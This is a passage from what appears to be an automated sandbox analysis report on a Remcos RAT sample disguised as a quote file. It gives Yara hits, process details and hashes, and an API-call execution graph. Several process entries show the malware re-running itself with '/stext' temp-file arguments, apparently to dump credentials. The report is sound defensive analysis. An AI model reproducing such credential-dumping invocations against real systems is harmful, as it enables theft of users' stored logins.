                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000003.2605511155.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000003.2609800552.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4604168918.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:6
                                                                                                  Start time:08:43:23
                                                                                                  Start date:02/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\qjya"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:840'424 bytes
                                                                                                  MD5 hash:A75036F188683604D03DD8F03FEE6EC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:08:43:23
                                                                                                  Start date:02/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\addkeox"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:840'424 bytes
                                                                                                  MD5 hash:A75036F188683604D03DD8F03FEE6EC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:08:43:24
                                                                                                  Start date:02/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\dfjdeyijjf"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:840'424 bytes
                                                                                                  MD5 hash:A75036F188683604D03DD8F03FEE6EC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:24.4%
                                                                                                    Dynamic/Decrypted Code Coverage:14.2%
                                                                                                    Signature Coverage:20%
                                                                                                    Total number of Nodes:1498
                                                                                                    Total number of Limit Nodes:43
                                                                                                    execution_graph 3535 402340 3542 402acb 3535->3542 3538 402acb 17 API calls 3539 40235a 3538->3539 3540 402acb 17 API calls 3539->3540 3541 402364 GetPrivateProfileStringA 3540->3541 3543 402ad7 3542->3543 3548 4060f6 3543->3548 3546 402351 3546->3538 3549 406103 3548->3549 3550 406325 3549->3550 3553 4062ff lstrlenA 3549->3553 3556 4060f6 10 API calls 3549->3556 3558 40621b GetSystemDirectoryA 3549->3558 3559 40622e GetWindowsDirectoryA 3549->3559 3560 40633e 5 API calls 3549->3560 3561 406262 SHGetSpecialFolderLocation 3549->3561 3562 4060f6 10 API calls 3549->3562 3563 4062a8 lstrcatA 3549->3563 3574 405fbb 3549->3574 3579 406032 wsprintfA 3549->3579 3580 4060d4 lstrcpynA 3549->3580 3551 402af8 3550->3551 3581 4060d4 lstrcpynA 3550->3581 3551->3546 3565 40633e 3551->3565 3553->3549 3556->3553 3558->3549 3559->3549 3560->3549 3561->3549 3564 40627a SHGetPathFromIDListA CoTaskMemFree 3561->3564 3562->3549 3563->3549 3564->3549 3572 40634a 3565->3572 3566 4063b2 3567 4063b6 CharPrevA 3566->3567 3569 4063d1 3566->3569 3567->3566 3568 4063a7 CharNextA 3568->3566 3568->3572 3569->3546 3571 406395 CharNextA 3571->3572 3572->3566 3572->3568 3572->3571 3573 4063a2 CharNextA 3572->3573 3586 405a97 3572->3586 3573->3568 3582 405f5a 3574->3582 3577 405fef RegQueryValueExA RegCloseKey 3578 40601e 3577->3578 3578->3549 3579->3549 3580->3549 3581->3551 3583 405f69 3582->3583 3584 405f72 RegOpenKeyExA 3583->3584 3585 405f6d 3583->3585 3584->3585 3585->3577 3585->3578 3587 405a9d 3586->3587 3588 405ab0 3587->3588 3589 405aa3 CharNextA 3587->3589 3588->3572 3589->3587 4629 4038c0 4630 4038cb 4629->4630 4631 4038d2 GlobalAlloc 4630->4631 4632 4038cf 4630->4632 4631->4632 4633 401d41 GetDlgItem GetClientRect 4634 402acb 17 API calls 4633->4634 4635 401d71 LoadImageA SendMessageA 4634->4635 4636 402957 4635->4636 4637 401d8f DeleteObject 4635->4637 4637->4636 3842 401746 3843 402acb 17 API calls 3842->3843 3844 40174d 3843->3844 3848 405c9c 3844->3848 3846 401754 3847 405c9c 2 API calls 3846->3847 3847->3846 3849 405ca7 GetTickCount GetTempFileNameA 3848->3849 3850 405cd8 3849->3850 3851 405cd4 3849->3851 3850->3846 3851->3849 3851->3850 4638 401947 4639 402acb 17 API calls 4638->4639 4640 40194e lstrlenA 4639->4640 4641 40257d 4640->4641 4328 4025ca 4329 402aa9 17 API calls 4328->4329 4334 4025d4 4329->4334 4330 402642 4331 405ce5 ReadFile 4331->4334 4332 402644 4337 406032 wsprintfA 4332->4337 4333 402654 4333->4330 4336 40266a SetFilePointer 4333->4336 4334->4330 4334->4331 4334->4332 4334->4333 4336->4330 4337->4330 4645 40224b 4646 402acb 17 API calls 4645->4646 4647 402251 4646->4647 4648 402acb 17 API calls 4647->4648 4649 40225a 4648->4649 4650 402acb 17 API calls 4649->4650 4651 402263 4650->4651 4652 4063d7 2 API calls 4651->4652 4653 40226c 4652->4653 4654 40227d lstrlenA lstrlenA 4653->4654 4658 402270 4653->4658 4655 4051fb 24 API calls 4654->4655 4657 4022b9 SHFileOperationA 4655->4657 4656 4051fb 24 API calls 4659 402278 4656->4659 4657->4658 4657->4659 4658->4656 4660 4022cd 4661 4022d4 4660->4661 4665 4022e7 4660->4665 4662 4060f6 17 API calls 4661->4662 4663 4022e1 4662->4663 4664 4057f0 MessageBoxIndirectA 4663->4664 4664->4665 4666 738e1000 4669 738e101b 4666->4669 4676 738e14bb 4669->4676 4671 738e1020 4672 738e1027 GlobalAlloc 4671->4672 4673 738e1024 4671->4673 4672->4673 4674 738e14e2 3 API calls 4673->4674 4675 738e1019 4674->4675 4678 738e14c1 4676->4678 4677 738e14c7 4677->4671 4678->4677 4679 738e14d3 GlobalFree 4678->4679 4679->4671 4680 738e221e 4681 738e2288 4680->4681 4682 738e22b2 4681->4682 4683 738e2293 GlobalAlloc 4681->4683 4683->4681 4684 4020d1 4685 402acb 17 API calls 4684->4685 4686 4020d8 4685->4686 4687 402acb 17 API calls 4686->4687 4688 4020e2 4687->4688 4689 402acb 17 API calls 4688->4689 4690 4020ec 4689->4690 4691 402acb 17 API calls 4690->4691 4692 4020f6 4691->4692 4693 402acb 17 API calls 4692->4693 4695 402100 4693->4695 4694 402142 CoCreateInstance 4699 402161 4694->4699 4701 40220c 4694->4701 4695->4694 4696 402acb 17 API calls 4695->4696 4696->4694 4697 401423 24 API calls 4698 402242 4697->4698 4700 4021ec MultiByteToWideChar 4699->4700 4699->4701 4700->4701 4701->4697 4701->4698 4702 4026d4 4703 4026da 4702->4703 4704 4026de FindNextFileA 4703->4704 4707 4026f0 4703->4707 4705 40272f 4704->4705 4704->4707 4708 4060d4 lstrcpynA 4705->4708 4708->4707 4709 738e2b9b 4710 738e2bb3 4709->4710 4711 738e1534 2 API calls 4710->4711 4712 738e2bce 4711->4712 4372 406656 4373 40665e 4372->4373 4373->4373 4374 40666e GlobalAlloc 4373->4374 4375 406668 GlobalFree 4373->4375 4376 406682 4374->4376 4375->4374 4377 4066e5 GlobalAlloc 4376->4377 4378 4066dc GlobalFree 4376->4378 4379 4066fb 4376->4379 4377->4379 4378->4377 4380 4023d6 4381 402acb 17 API calls 4380->4381 4382 4023e8 4381->4382 4383 402acb 17 API calls 4382->4383 4384 4023f2 4383->4384 4397 402b5b 4384->4397 4387 40271c 4388 402427 4390 402433 4388->4390 4393 402aa9 17 API calls 4388->4393 4389 402acb 17 API calls 4392 402420 lstrlenA 4389->4392 4391 402452 RegSetValueExA 4390->4391 4394 403059 40 API calls 4390->4394 4395 402468 RegCloseKey 4391->4395 4392->4388 4393->4390 4394->4391 4395->4387 4398 402b76 4397->4398 4401 405f88 4398->4401 4402 405f97 4401->4402 4403 405fa2 RegCreateKeyExA 4402->4403 4404 402402 4402->4404 4403->4404 4404->4387 4404->4388 4404->4389 4713 404956 4714 404982 4713->4714 4715 404966 4713->4715 4716 4049b5 4714->4716 4717 404988 SHGetPathFromIDListA 4714->4717 4724 4057d4 GetDlgItemTextA 4715->4724 4720 40499f SendMessageA 4717->4720 4721 404998 4717->4721 4719 404973 SendMessageA 4719->4714 4720->4716 4722 40140b 2 API calls 4721->4722 4722->4720 4724->4719 4725 4014d6 4726 402aa9 17 API calls 4725->4726 4727 4014dc Sleep 4726->4727 4729 402957 4727->4729 4405 401759 4406 402acb 17 API calls 4405->4406 4407 401760 4406->4407 4408 401786 4407->4408 4409 40177e 4407->4409 4446 4060d4 lstrcpynA 4408->4446 4445 4060d4 lstrcpynA 4409->4445 4412 401784 4416 40633e 5 API calls 4412->4416 4413 401791 4414 405a6c 3 API calls 4413->4414 4415 401797 lstrcatA 4414->4415 4415->4412 4421 4017a3 4416->4421 4417 4017e4 4419 405c48 2 API calls 4417->4419 4418 4063d7 2 API calls 4418->4421 4419->4421 4421->4417 4421->4418 4422 4017ba CompareFileTime 4421->4422 4423 40187e 4421->4423 4431 4060f6 17 API calls 4421->4431 4435 4060d4 lstrcpynA 4421->4435 4438 4057f0 MessageBoxIndirectA 4421->4438 4442 401855 4421->4442 4444 405c6d GetFileAttributesA CreateFileA 4421->4444 4422->4421 4424 4051fb 24 API calls 4423->4424 4426 401888 4424->4426 4425 4051fb 24 API calls 4443 40186a 4425->4443 4427 403059 40 API calls 4426->4427 4428 40189b 4427->4428 4429 4018af SetFileTime 4428->4429 4430 4018c1 CloseHandle 4428->4430 4429->4430 4432 4018d2 4430->4432 4430->4443 4431->4421 4433 4018d7 4432->4433 4434 4018ea 4432->4434 4436 4060f6 17 API calls 4433->4436 4437 4060f6 17 API calls 4434->4437 4435->4421 4439 4018df lstrcatA 4436->4439 4440 4018f2 4437->4440 4438->4421 4439->4440 4441 4057f0 MessageBoxIndirectA 4440->4441 4441->4443 4442->4425 4442->4443 4444->4421 4445->4412 4446->4413 4730 401659 4731 402acb 17 API calls 4730->4731 4732 40165f 4731->4732 4733 4063d7 2 API calls 4732->4733 4734 401665 4733->4734 4735 401959 4736 402aa9 17 API calls 4735->4736 4737 401960 4736->4737 4738 402aa9 17 API calls 4737->4738 4739 40196d 4738->4739 4740 402acb 17 API calls 4739->4740 4741 401984 lstrlenA 4740->4741 4743 401994 4741->4743 4742 4019d4 4743->4742 4747 4060d4 lstrcpynA 4743->4747 4745 4019c4 4745->4742 4746 4019c9 lstrlenA 4745->4746 4746->4742 4747->4745 4748 401cda 4749 402aa9 17 API calls 4748->4749 4750 401ce0 IsWindow 4749->4750 4751 401a0e 4750->4751 4752 401a5e 4753 402aa9 17 API calls 4752->4753 4754 401a67 4753->4754 4755 402aa9 17 API calls 4754->4755 4756 401a0e 4755->4756 4757 4042de 4758 4042f4 4757->4758 4765 404400 4757->4765 4761 404173 18 API calls 4758->4761 4759 40446f 4760 404539 4759->4760 4762 404479 GetDlgItem 4759->4762 4767 4041da 8 API calls 4760->4767 4766 40434a 4761->4766 4763 4044f7 4762->4763 4764 40448f 4762->4764 4763->4760 4771 404509 4763->4771 4764->4763 4770 4044b5 SendMessageA LoadCursorA SetCursor 4764->4770 4765->4759 4765->4760 4768 404444 GetDlgItem SendMessageA 4765->4768 4769 404173 18 API calls 4766->4769 4781 404534 4767->4781 4790 404195 KiUserCallbackDispatcher 4768->4790 4773 404357 CheckDlgButton 4769->4773 4794 404582 4770->4794 4776 404520 4771->4776 4777 40450f SendMessageA 4771->4777 4788 404195 KiUserCallbackDispatcher 4773->4788 4776->4781 4782 404526 SendMessageA 4776->4782 4777->4776 4778 40446a 4791 40455e 4778->4791 4779 404375 GetDlgItem 4789 4041a8 SendMessageA 4779->4789 4782->4781 4785 40438b SendMessageA 4786 4043b2 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4785->4786 4787 4043a9 GetSysColor 4785->4787 4786->4781 4787->4786 4788->4779 4789->4785 4790->4778 4792 404571 SendMessageA 4791->4792 4793 40456c 4791->4793 4792->4759 4793->4792 4797 4057b6 ShellExecuteExA 4794->4797 4796 4044e8 LoadCursorA SetCursor 4796->4763 4797->4796 4798 401f61 4799 402acb 17 API calls 4798->4799 4800 401f68 4799->4800 4801 40646c 5 API calls 4800->4801 4802 401f77 4801->4802 4803 401f8f GlobalAlloc 4802->4803 4804 401ff7 4802->4804 4803->4804 4805 401fa3 4803->4805 4806 40646c 5 API calls 4805->4806 4807 401faa 4806->4807 4808 40646c 5 API calls 4807->4808 4809 401fb4 4808->4809 4809->4804 4813 406032 wsprintfA 4809->4813 4811 401feb 4814 406032 wsprintfA 4811->4814 4813->4811 4814->4804 4815 402561 4816 402acb 17 API calls 4815->4816 4817 402568 4816->4817 4820 405c6d GetFileAttributesA CreateFileA 4817->4820 4819 402574 4820->4819 4821 4064e1 WaitForSingleObject 4822 4064fb 4821->4822 4823 40650d GetExitCodeProcess 4822->4823 4824 4064a8 2 API calls 4822->4824 4825 406502 WaitForSingleObject 4824->4825 4825->4822 4826 401563 4827 4028ff 4826->4827 4830 406032 wsprintfA 4827->4830 4829 402904 4830->4829 4831 401b63 4832 401bb4 4831->4832 4834 401b70 4831->4834 4835 401bb8 4832->4835 4836 401bdd GlobalAlloc 4832->4836 4833 401bf8 4837 4060f6 17 API calls 4833->4837 4846 4022e7 4833->4846 4834->4833 4839 401b87 4834->4839 4835->4846 4852 4060d4 lstrcpynA 4835->4852 4838 4060f6 17 API calls 4836->4838 4841 4022e1 4837->4841 4838->4833 4850 4060d4 lstrcpynA 4839->4850 4844 4057f0 MessageBoxIndirectA 4841->4844 4843 401bca GlobalFree 4843->4846 4844->4846 4845 401b96 4851 4060d4 lstrcpynA 4845->4851 4848 401ba5 4853 4060d4 lstrcpynA 4848->4853 4850->4845 4851->4848 4852->4843 4853->4846 3828 4024e5 3829 402b0b 17 API calls 3828->3829 3830 4024ef 3829->3830 3839 402aa9 3830->3839 3832 4024f8 3833 402513 RegEnumKeyA 3832->3833 3834 40251f RegEnumValueA 3832->3834 3837 40271c 3832->3837 3835 40253b RegCloseKey 3833->3835 3834->3835 3836 402534 3834->3836 3835->3837 3836->3835 3840 4060f6 17 API calls 3839->3840 3841 402abe 3840->3841 3841->3832 4292 40166a 4293 402acb 17 API calls 4292->4293 4294 401671 4293->4294 4295 402acb 17 API calls 4294->4295 4296 40167a 4295->4296 4297 402acb 17 API calls 4296->4297 4298 401683 MoveFileA 4297->4298 4299 401696 4298->4299 4300 40168f 4298->4300 4302 4063d7 2 API calls 4299->4302 4304 402242 4299->4304 4301 401423 24 API calls 4300->4301 4301->4304 4303 4016a5 4302->4303 4303->4304 4305 405eb3 36 API calls 4303->4305 4305->4300 4854 4019ed 4855 402acb 17 API calls 4854->4855 4856 4019f4 4855->4856 4857 402acb 17 API calls 4856->4857 4858 4019fd 4857->4858 4859 401a04 lstrcmpiA 4858->4859 4860 401a16 lstrcmpA 4858->4860 4861 401a0a 4859->4861 4860->4861 4349 40156f 4350 401586 4349->4350 4351 40157f ShowWindow 4349->4351 4352 401594 ShowWindow 4350->4352 4353 402957 4350->4353 4351->4350 4352->4353 4862 40516f 4863 405193 4862->4863 4864 40517f 4862->4864 4865 40519b IsWindowVisible 4863->4865 4873 4051b2 4863->4873 4866 405185 4864->4866 4867 4051dc 4864->4867 4865->4867 4868 4051a8 4865->4868 4870 4041bf SendMessageA 4866->4870 4869 4051e1 CallWindowProcA 4867->4869 4875 404ac6 SendMessageA 4868->4875 4872 40518f 4869->4872 4870->4872 4873->4869 4880 404b46 4873->4880 4876 404b25 SendMessageA 4875->4876 4877 404ae9 GetMessagePos ScreenToClient SendMessageA 4875->4877 4879 404b1d 4876->4879 4878 404b22 4877->4878 4877->4879 4878->4876 4879->4873 4889 4060d4 lstrcpynA 4880->4889 4882 404b59 4890 406032 wsprintfA 4882->4890 4884 404b63 4885 40140b 2 API calls 4884->4885 4886 404b6c 4885->4886 4891 4060d4 lstrcpynA 4886->4891 4888 404b73 4888->4867 4889->4882 4890->4884 4891->4888 4892 738e163c 4893 738e166b 4892->4893 4894 738e1a9c 18 API calls 4893->4894 4895 738e1672 4894->4895 4896 738e1679 4895->4896 4897 738e1685 4895->4897 4898 738e1266 2 API calls 4896->4898 4899 738e168f 4897->4899 4900 738e16ac 4897->4900 4903 738e1683 4898->4903 4904 738e14e2 3 API calls 4899->4904 4901 738e16d6 4900->4901 4902 738e16b2 4900->4902 4906 738e14e2 3 API calls 4901->4906 4905 738e1559 3 API calls 4902->4905 4907 738e1694 4904->4907 4908 738e16b7 4905->4908 4906->4903 4909 738e1559 3 API calls 4907->4909 4910 738e1266 2 API calls 4908->4910 4911 738e169a 4909->4911 4912 738e16bd GlobalFree 4910->4912 4913 738e1266 2 API calls 4911->4913 4912->4903 4914 738e16d1 GlobalFree 4912->4914 4915 738e16a0 GlobalFree 4913->4915 4914->4903 4915->4903 4360 402473 4361 402b0b 17 API calls 4360->4361 4362 40247d 4361->4362 4363 402acb 17 API calls 4362->4363 4364 402486 4363->4364 4365 402490 RegQueryValueExA 4364->4365 4369 40271c 4364->4369 4366 4024b0 4365->4366 4370 4024b6 RegCloseKey 4365->4370 4366->4370 4371 406032 wsprintfA 4366->4371 4370->4369 4371->4370 4916 738e103d 4917 738e101b 5 API calls 4916->4917 4918 738e1056 4917->4918 4919 4014f4 SetForegroundWindow 4920 402957 4919->4920 4921 738e183b 4922 738e185e 4921->4922 4923 738e18a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4922->4923 4924 738e188e GlobalFree 4922->4924 4925 738e1266 2 API calls 4923->4925 4924->4923 4926 738e1a22 GlobalFree GlobalFree 4925->4926 4927 404b78 GetDlgItem GetDlgItem 4928 404bca 7 API calls 4927->4928 4935 404de2 4927->4935 4929 404c60 SendMessageA 4928->4929 4930 404c6d DeleteObject 4928->4930 4929->4930 4931 404c76 4930->4931 4933 404cad 4931->4933 4934 4060f6 17 API calls 4931->4934 4932 404ec6 4937 404f72 4932->4937 4946 404f1f SendMessageA 4932->4946 4967 404dd5 4932->4967 4936 404173 18 API calls 4933->4936 4938 404c8f SendMessageA SendMessageA 4934->4938 4935->4932 4944 404ac6 5 API calls 4935->4944 4970 404e53 4935->4970 4941 404cc1 4936->4941 4939 404f84 4937->4939 4940 404f7c SendMessageA 4937->4940 4938->4931 4948 404f96 ImageList_Destroy 4939->4948 4949 404f9d 4939->4949 4965 404fad 4939->4965 4940->4939 4945 404173 18 API calls 4941->4945 4942 4041da 8 API calls 4947 405168 4942->4947 4943 404eb8 SendMessageA 4943->4932 4944->4970 4963 404ccf 4945->4963 4950 404f34 SendMessageA 4946->4950 4946->4967 4948->4949 4951 404fa6 GlobalFree 4949->4951 4949->4965 4953 404f47 4950->4953 4951->4965 4952 404da3 GetWindowLongA SetWindowLongA 4956 404dbc 4952->4956 4959 404f58 SendMessageA 4953->4959 4954 40511c 4955 40512e ShowWindow GetDlgItem ShowWindow 4954->4955 4954->4967 4955->4967 4957 404dc2 ShowWindow 4956->4957 4958 404dda 4956->4958 4978 4041a8 SendMessageA 4957->4978 4979 4041a8 SendMessageA 4958->4979 4959->4937 4960 404d9d 4960->4952 4960->4956 4963->4952 4963->4960 4964 404d1e SendMessageA 4963->4964 4968 404d5a SendMessageA 4963->4968 4969 404d6b SendMessageA 4963->4969 4964->4963 4965->4954 4966 404b46 4 API calls 4965->4966 4974 404fe8 4965->4974 4966->4974 4967->4942 4968->4963 4969->4963 4970->4932 4970->4943 4971 4050f2 InvalidateRect 4971->4954 4972 405108 4971->4972 4980 404a81 4972->4980 4973 405016 SendMessageA 4977 40502c 4973->4977 4974->4973 4974->4977 4976 4050a0 SendMessageA SendMessageA 4976->4977 4977->4971 4977->4976 4978->4967 4979->4935 4983 4049bc 4980->4983 4982 404a96 4982->4954 4984 4049d2 4983->4984 4985 4060f6 17 API calls 4984->4985 4986 404a36 4985->4986 4987 4060f6 17 API calls 4986->4987 4988 404a41 4987->4988 4989 4060f6 17 API calls 4988->4989 4990 404a57 lstrlenA wsprintfA SetDlgItemTextA 4989->4990 4990->4982 4991 401cfb 4992 402aa9 17 API calls 4991->4992 4993 401d02 4992->4993 4994 402aa9 17 API calls 4993->4994 4995 401d0e GetDlgItem 4994->4995 4996 40257d 4995->4996 4537 4022fc 4538 402304 4537->4538 4539 40230a 4537->4539 4540 402acb 17 API calls 4538->4540 4541 40231a 4539->4541 4542 402acb 17 API calls 4539->4542 4540->4539 4543 402328 4541->4543 4544 402acb 17 API calls 4541->4544 4542->4541 4545 402acb 17 API calls 4543->4545 4544->4543 4546 402331 WritePrivateProfileStringA 4545->4546 4997 402c7c 4998 402ca4 4997->4998 4999 402c8b SetTimer 4997->4999 5000 402cf2 4998->5000 5001 402cf8 MulDiv 4998->5001 4999->4998 5002 402cb2 wsprintfA SetWindowTextA SetDlgItemTextA 5001->5002 5002->5000 5004 4018fd 5005 401934 5004->5005 5006 402acb 17 API calls 5005->5006 5007 401939 5006->5007 5008 40589c 67 API calls 5007->5008 5009 401942 5008->5009 5010 4026fe 5011 402acb 17 API calls 5010->5011 5012 402705 FindFirstFileA 5011->5012 5013 402728 5012->5013 5014 402718 5012->5014 5015 40272f 5013->5015 5018 406032 wsprintfA 5013->5018 5019 4060d4 lstrcpynA 5015->5019 5018->5015 5019->5014 5020 401000 5021 401037 BeginPaint GetClientRect 5020->5021 5023 40100c DefWindowProcA 5020->5023 5024 4010f3 5021->5024 5025 401179 5023->5025 5026 401073 CreateBrushIndirect FillRect DeleteObject 5024->5026 5027 4010fc 5024->5027 5026->5024 5028 401102 CreateFontIndirectA 5027->5028 5029 401167 EndPaint 5027->5029 5028->5029 5030 401112 6 API calls 5028->5030 5029->5025 5030->5029 5031 401900 5032 402acb 17 API calls 5031->5032 5033 401907 5032->5033 5034 4057f0 MessageBoxIndirectA 5033->5034 5035 401910 5034->5035 3590 402381 3591 4023b3 3590->3591 3592 402388 3590->3592 3594 402acb 17 API calls 3591->3594 3602 402b0b 3592->3602 3596 4023ba 3594->3596 3607 402b89 3596->3607 3597 402399 3599 402acb 17 API calls 3597->3599 3600 4023a0 RegDeleteValueA RegCloseKey 3599->3600 3601 4023c7 3600->3601 3603 402acb 17 API calls 3602->3603 3604 402b22 3603->3604 3605 405f5a RegOpenKeyExA 3604->3605 3606 40238f 3605->3606 3606->3597 3606->3601 3608 402b9c 3607->3608 3609 402b95 3607->3609 3608->3609 3611 402bcd 3608->3611 3609->3601 3612 405f5a RegOpenKeyExA 3611->3612 3613 402bfb 3612->3613 3614 402c75 3613->3614 3616 402bff 3613->3616 3614->3609 3615 402c21 RegEnumKeyA 3615->3616 3617 402c38 RegCloseKey 3615->3617 3616->3615 3616->3617 3619 402c59 RegCloseKey 3616->3619 3621 402bcd 6 API calls 3616->3621 3624 40646c GetModuleHandleA 3617->3624 3619->3614 3621->3616 3622 402c69 RegDeleteKeyA 3622->3614 3623 402c4c 3623->3614 3625 406492 GetProcAddress 3624->3625 3626 406488 3624->3626 3629 402c48 3625->3629 3630 4063fe GetSystemDirectoryA 3626->3630 3628 40648e 3628->3625 3628->3629 3629->3622 3629->3623 3631 406420 wsprintfA LoadLibraryExA 3630->3631 3631->3628 5036 401502 5037 40150a 5036->5037 5039 40151d 5036->5039 5038 402aa9 17 API calls 5037->5038 5038->5039 3633 402003 3634 402015 3633->3634 3643 4020c3 3633->3643 3635 402acb 17 API calls 3634->3635 3636 40201c 3635->3636 3638 402acb 17 API calls 3636->3638 3637 401423 24 API calls 3644 402242 3637->3644 3639 402025 3638->3639 3640 40203a LoadLibraryExA 3639->3640 3641 40202d GetModuleHandleA 3639->3641 3642 40204a GetProcAddress 3640->3642 3640->3643 3641->3640 3641->3642 3645 402096 3642->3645 3646 402059 3642->3646 3643->3637 3699 4051fb 3645->3699 3648 402061 3646->3648 3649 402078 3646->3649 3696 401423 3648->3696 3654 738e16df 3649->3654 3650 402069 3650->3644 3652 4020b7 FreeLibrary 3650->3652 3652->3644 3655 738e170f 3654->3655 3710 738e1a9c 3655->3710 3657 738e1716 3658 738e1838 3657->3658 3659 738e172e 3657->3659 3660 738e1727 3657->3660 3658->3650 3742 738e22b5 3659->3742 3758 738e2273 3660->3758 3665 738e1774 3771 738e249c 3665->3771 3666 738e1792 3671 738e1798 3666->3671 3672 738e17e0 3666->3672 3667 738e175d 3680 738e1753 3667->3680 3768 738e2c7b 3667->3768 3668 738e1744 3670 738e174a 3668->3670 3674 738e1755 3668->3674 3670->3680 3752 738e29c0 3670->3752 3790 738e156b 3671->3790 3678 738e249c 11 API calls 3672->3678 3673 738e177a 3782 738e1559 3673->3782 3762 738e2676 3674->3762 3683 738e17d1 3678->3683 3680->3665 3680->3666 3687 738e1827 3683->3687 3797 738e2462 3683->3797 3685 738e175b 3685->3680 3686 738e249c 11 API calls 3686->3683 3687->3658 3691 738e1831 GlobalFree 3687->3691 3691->3658 3693 738e1813 3693->3687 3801 738e14e2 wsprintfA 3693->3801 3694 738e180c FreeLibrary 3694->3693 3697 4051fb 24 API calls 3696->3697 3698 401431 3697->3698 3698->3650 3700 405216 3699->3700 3709 4052b9 3699->3709 3701 405233 lstrlenA 3700->3701 3702 4060f6 17 API calls 3700->3702 3703 405241 lstrlenA 3701->3703 3704 40525c 3701->3704 3702->3701 3707 405253 lstrcatA 3703->3707 3703->3709 3705 405262 SetWindowTextA 3704->3705 3706 40526f 3704->3706 3705->3706 3708 405275 SendMessageA SendMessageA SendMessageA 3706->3708 3706->3709 3707->3704 3708->3709 3709->3650 3804 738e1215 GlobalAlloc 3710->3804 3712 738e1ac0 3805 738e1215 GlobalAlloc 3712->3805 3714 738e1ce2 GlobalFree GlobalFree GlobalFree 3716 738e1cff 3714->3716 3723 738e1d49 3714->3723 3715 738e1acb 3715->3714 3718 738e1b9f GlobalAlloc 3715->3718 3720 738e1c08 GlobalFree 3715->3720 3715->3723 3724 738e1bea lstrcpyA 3715->3724 3725 738e1bf4 lstrcpyA 3715->3725 3731 738e1f99 3715->3731 3732 738e2015 3715->3732 3736 738e1edb GlobalFree 3715->3736 3737 738e1224 2 API calls 3715->3737 3806 738e1534 GlobalSize GlobalAlloc 3715->3806 3717 738e20b5 3716->3717 3716->3723 3726 738e1d14 3716->3726 3719 738e20d7 GetModuleHandleA 3717->3719 3717->3723 3718->3715 3721 738e20fd 3719->3721 3722 738e20e8 LoadLibraryA 3719->3722 3720->3715 3812 738e15c6 GetProcAddress 3721->3812 3722->3721 3722->3723 3723->3657 3724->3725 3725->3715 3726->3723 3808 738e1224 3726->3808 3729 738e215b lstrlenA 3813 738e15c6 GetProcAddress 3729->3813 3730 738e214e 3730->3723 3730->3729 3811 738e1215 GlobalAlloc 3731->3811 3732->3723 3735 738e2059 lstrcpyA 3732->3735 3735->3723 3736->3715 3737->3715 3739 738e210f 3739->3730 3740 738e2138 GetProcAddress 3739->3740 3740->3730 3741 738e1fa1 3741->3657 3750 738e22ce 3742->3750 3744 738e240a GlobalFree 3745 738e1734 3744->3745 3744->3750 3745->3667 3745->3668 3745->3680 3746 738e237c GlobalAlloc MultiByteToWideChar 3748 738e23a8 GlobalAlloc CLSIDFromString GlobalFree 3746->3748 3749 738e23c9 3746->3749 3747 738e1224 GlobalAlloc lstrcpynA 3747->3750 3748->3744 3749->3744 3819 738e260a 3749->3819 3750->3744 3750->3746 3750->3747 3750->3749 3815 738e12ad 3750->3815 3754 738e29d2 3752->3754 3753 738e2a77 SetFilePointer 3755 738e2a95 3753->3755 3754->3753 3756 738e2b86 GetLastError 3755->3756 3757 738e2b91 3755->3757 3756->3757 3757->3680 3759 738e2288 3758->3759 3760 738e172d 3759->3760 3761 738e2293 GlobalAlloc 3759->3761 3760->3659 3761->3759 3766 738e26a6 3762->3766 3763 738e2754 3765 738e275a GlobalSize 3763->3765 3767 738e2764 3763->3767 3764 738e2741 GlobalAlloc 3764->3767 3765->3767 3766->3763 3766->3764 3767->3685 3769 738e2c86 3768->3769 3770 738e2cc6 GlobalFree 3769->3770 3822 738e1215 GlobalAlloc 3771->3822 3773 738e255c WideCharToMultiByte 3776 738e24a8 3773->3776 3774 738e2538 StringFromGUID2 WideCharToMultiByte 3774->3776 3775 